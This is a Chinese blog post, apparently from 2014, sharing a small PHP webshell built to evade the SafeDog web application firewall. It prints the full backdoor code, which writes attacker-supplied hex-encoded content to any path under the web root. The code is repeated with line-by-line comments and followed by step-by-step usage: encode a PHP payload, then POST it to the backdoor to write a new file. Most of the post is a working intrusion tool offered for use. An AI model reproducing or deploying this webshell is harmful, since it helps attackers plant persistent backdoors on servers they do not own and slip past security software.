php绕过安全狗检测的小马分享

博主推荐【腾讯云】爆款2核2G云服务器首年40元

php绕过安全狗检测的小马分享

zph | 2014-08-28 15:10

直接上代码:

<?php
$p=realpath(dirname(__FILE__).”/../”).$_POST[“a”];
$t=$_POST[“b”];
$tt=””;
for ($i=0;$i<strlen($t);$i+=2) $tt.=urldecode(“%”.substr($t,$i,2));
@fwrite(fopen($p,”w”),$tt);
echo “success!”;
?>

分析利用&过狗:

<?php
$p=realpath(dirname(__FILE__).”/../”).$_POST[“a”]; //定义$p为根目录的物理路径+$_POST[“a”]的内容
$t=$_POST[“b”]; //定义$t为$_POST[“b”]的内容
$tt=””; //定义$tt为空
for ($i=0;$i<strlen($t);$i+=2) $tt.=urldecode(“%”.substr($t,$i,2)); //for循环次数是$t长度/2,每循环一次就让$tt加上”%xx”这样的编码
@fwrite(fopen($p,”w”),$tt); //写入文件地址是$p,内容是$tt
echo “success!”;
?>

利用方法:

将写入的内容用url编码,比如<?php phpinfo();?>

编码后为:%3C%3F%70%68%70%20%70%68%70%69%6E%66%6F%28%29%3B%3F%3E

去掉其中的%,得到:3C3F70687020706870696E666F28293B3F3E

然后访问后门,将POST内容改为:

a=/111.php&b=3C3F70687020706870696E666F28293B3F3E

即可写入内容

过狗:

547d14d2d98f3ce2c_1

25a54417086ef2

[原文地址]

原创文章转载请注明:转载自 七行者博客

本文固定链接: https://www.qxzxp.com/5260.html

php绕过安全狗检测的小马分享:等您坐沙发呢!

发表评论

1 + 3 =

快捷键:Ctrl+Enter